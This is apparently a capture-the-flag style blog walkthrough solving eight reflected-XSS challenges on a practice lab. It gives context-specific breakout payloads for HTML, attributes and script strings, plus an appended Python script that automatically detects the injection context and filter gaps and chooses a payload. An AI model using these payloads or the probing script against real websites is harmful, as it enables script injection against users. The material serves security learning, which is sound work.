
leettime.net XSS challenge solution

How's it going, bros? Today we are gonna play the XSS challenge by leettime.net.
It consists of 8 different challenges where we need to pop up the URL of the webpage by executing alert(document.URL). The layout of the challenge page stays the same throughout the challenge.


We will be using d3v as the basic probe throughout the challenge: it is short, unlikely to occur anywhere else in the page, and therefore easy to locate in the source to see exactly where (and how) the input is reflected. So without wasting any more time, let's go!

Challenge 1

Let's enter d3v in the search box and observe the source code:

<center>cannot find d3v</center>

So the input is landing in HTML (text) context, with nothing filtered. In this case we can simply inject a new tag:

<svg onload=alert(URL)>

Let's see if it works or not.

It does! Hey wait, I don’t think it would be a good idea to add this image after every solution, so we will skip it.

Challenge 2

In the next challenge, the input gets reflected as follows:

<input type="text" name="name" value=d3v></input>

So it got reflected as the value of an attribute without any quotes around it. Since there is no quote to close, the simplest way to break out is a > that closes the current tag, after which we are back in HTML context. The complete payload will be:

><svg onload=alert(URL)>

Done!

Challenge 3

This is similar to the previous one, the only difference is that this time the value is within double quotes

<input type="text" name="name" value="d3v">

To close the value and then the tag, we will use "> and the complete payload will be:

"><svg onload=alert(URL)>

Challenge 4

Okay this is getting boring now. This time the value is within single quotes and hence the payload will be:

'><svg onload=alert(URL)>

Challenge 5

Phewww! Finally something different. This time its landing as a variable value inside a script block as follows:

<script>var search_str="d3v";</script>

In this case we will be using the following payload:

";alert(document.URL);"

Let's break it down to understand how it works:

  • " closes the string value
  • a ; terminates the assignment statement, so whatever follows is parsed as a new statement
  • the previous statement has ended and we are free to add our own code, so we inject alert(document.URL). Wait, why document.URL and not just URL like in the previous cases? Because inline event-handler attributes run with the element, its form and the document on the scope chain, so a bare URL there resolves to document.URL. Inside a <script> block the bare name URL is the global URL constructor (window.URL), and alert(URL) would only display that constructor rather than the page address, so the property has to be spelled out.
  • ; terminates our statement
  • the trailing " pairs with the closing " that is already in the source, keeping the syntax valid

On putting it together, it looks like this:

<script>var search_str="";alert(document.URL);"";</script>

It looks beautiful, doesn’t it?

Challenge 6

Oh boy! This is not how you create challenges. This challenge is the same as the previous one; the only difference is that this time the variable value is contained within single quotes (') and hence the payload will be:

';alert(document.URL);'

Challenge 7

Here’s the reflection

<input type="text" name="name" value='d3v'></input>

We have done this before: let's close the value and the tag by adding '> and the payload will be

'><svg onload=alert(URL)>

Oopps! It didn’t work!
Lets take a look at the source code for clues

<input type="text" name="name" value=''<svg onload=alert(URL)'></input>

Hmmm, so the > is getting filtered: we can't close the tag, but we can still close the value and inject an event-handler attribute instead. We will use the following payload:

'autofocus onfocus='alert(URL)

It works and before we break it down, lets see how it gets reflected

<input type="text" name="name" value=''autofocus onfocus='alert(URL)'></input>

Now let's break it down:

  • ' closes the attribute value
  • autofocus makes the browser focus the element automatically when the page loads, so no user interaction is needed (note that only the first autofocus element in a document receives focus, so this trick fails if the page already has one earlier in the markup)
  • onfocus is an event handler which fires when the element receives focus
  • the ' after onfocus= opens the handler's value; the site's own closing ' then ends it, keeping the markup valid

Challenge 8

Here’s the reflection

<input type="text" name="name" value='d3v'></input>

Yes, I know it's the same as the previous one, but in this one single quotes (') are getting filtered and hence we can't break out of the value.
So what's the catch? Well, the resulting URL after the search is

http://leettime.net/xsslab1/stage--08.php?name=d3v&submit=search

So the thing is that the value of the submit parameter is also getting reflected. The reflection is

<input type="text" name="name" value='d3v'></input>
<input type="submit" name="submit" value="search">

So let's inject our payload in the submit parameter instead. It lands in a double-quoted attribute, and since > is still unavailable we reuse the event-handler trick from the previous stage with double quotes:

"autofocus onfocus="alert(URL)

annnnddd that's it! We completed the challenge.
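All eight stages are one procedure repeated: reflect a probe, read off which context it lands in, check which of " ' < > survive the filter, and pick the payload that fits. The Python script below automates exactly that. It is an added example, not code from this walkthrough or from leettime.net: the stage_reflect responses are constructed stand-ins that mimic the eight reflections shown above (nothing is sent to the real site), the d3v / v3d markers are mine, and the assumption that stage 8 also strips > is mine (the stage 8 payload above avoids > but the page never states it is filtered). The fallback for an unquoted attribute when > is filtered (" autofocus onfocus=alert(URL)") goes one step beyond the payloads on the page.

```python
"""Reflected-XSS context probing, automated (added example, not code from the page).

stage_reflect() returns constructed stand-ins for the eight leettime.net reflections
described in the walkthrough; nothing is sent to the site.
"""

PROBE, SUFFIX = "d3v", "v3d"          # markers chosen so "d3v<char>v3d" is easy to find
TAG_PAYLOAD = "<svg onload=alert(URL)>"


def stage_reflect(stage, overrides):
    """Simulate stage N: reflect the query parameters into HTML the way the page does."""
    p = {"name": "x", "submit": "search", **overrides}
    name, submit = p["name"], p["submit"]
    if stage == 1:
        return f"<center>cannot find {name}</center>"
    if stage == 2:
        return f'<input type="text" name="name" value={name}></input>'
    if stage == 3:
        return f'<input type="text" name="name" value="{name}">'
    if stage == 4:
        return f"<input type=\"text\" name=\"name\" value='{name}'>"
    if stage == 5:
        return f'<script>var search_str="{name}";</script>'
    if stage == 6:
        return f"<script>var search_str='{name}';</script>"
    if stage == 7:  # strips '>' so the tag cannot be closed
        return f"<input type=\"text\" name=\"name\" value='{name.replace('>', '')}'></input>"
    if stage == 8:  # strips "'" (per the page) and, assumed here, '>' too; reflects both params
        def clean(s):
            return s.replace("'", "").replace(">", "")
        return (f"<input type=\"text\" name=\"name\" value='{clean(name)}'></input>\n"
                f'<input type="submit" name="submit" value="{clean(submit)}">')
    raise ValueError(f"unknown stage {stage}")


def make_stage(stage):
    """Return a reflect(overrides) -> html callable for one stage."""
    return lambda overrides: stage_reflect(stage, overrides)


def find_context(html, probe=PROBE):
    """Classify where the probe landed by inspecting the markup before it."""
    i = html.find(probe)
    if i < 0:
        return None
    before = html[:i]
    quote = before[-1:]          # character immediately preceding the probe
    low = before.lower()
    if low.rfind("<script") > low.rfind("</script>"):   # inside an open <script> block
        return {'"': "js-double", "'": "js-single"}.get(quote, "js-raw")
    if before.rfind("<") > before.rfind(">"):             # inside a tag that is not yet closed
        return {'"': "attr-double", "'": "attr-single"}.get(quote, "attr-unquoted")
    return "html"


def surviving_chars(reflect, param, chars="\"'<>"):
    """Send PROBE+c+SUFFIX for each special character; keep those reflected intact."""
    alive = set()
    for c in chars:
        marker = PROBE + c + SUFFIX
        if marker in reflect({param: marker}):
            alive.add(c)
    return alive


def choose_payload(context, alive):
    """Pick the walkthrough's payload for this context, given which characters survive."""
    tag_ok = {"<", ">"} <= alive
    if context == "html":
        return TAG_PAYLOAD if tag_ok else None
    if context == "attr-unquoted":
        # No quote to close: '>' ends the tag; otherwise a space starts a new attribute
        return ">" + TAG_PAYLOAD if tag_ok else " autofocus onfocus=alert(URL)"
    if context in ("attr-double", "attr-single"):
        q = '"' if context == "attr-double" else "'"
        if q not in alive:
            return None                         # cannot leave the value; try another parameter
        if tag_ok:
            return q + ">" + TAG_PAYLOAD         # close value, close tag, inject a new tag
        return f"{q}autofocus onfocus={q}alert(URL)"   # stay in the tag, add a handler
    if context in ("js-double", "js-single"):
        q = '"' if context == "js-double" else "'"
        # inside <script> the bare name URL is the URL constructor, so use document.URL
        return f"{q};alert(document.URL);{q}" if q in alive else None
    return None


def solve(reflect, params=("name", "submit")):
    """Probe each parameter in turn; return (param, context, payload) for the first that works."""
    for param in params:
        context = find_context(reflect({param: PROBE}))
        if context is None:
            continue
        payload = choose_payload(context, surviving_chars(reflect, param))
        if payload is not None:
            return param, context, payload
    return None


if __name__ == "__main__":
    for n in range(1, 9):
        print(n, solve(make_stage(n)))
```

Run as-is and it prints the parameter, context and payload for each stage; stages 1 to 7 resolve on name, stage 8 falls through to submit because the single quote never survives. Against a real target the reflect callable would wrap an HTTP request, and the same survival check decides between closing the tag and injecting a handler.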


About the author

D3V

I am Somdev Sangwan also known as D3V. I am n00b and I love computers and hacking. I am a python freak and your friendly neighborhood hacker.

2 Comments


  • hello,

    in challenge 8 it filtered out the " symbol.
    and in the source code it's showing: value='"autofocus onfocus="alert(document.URL)'>

    how to resolve it.
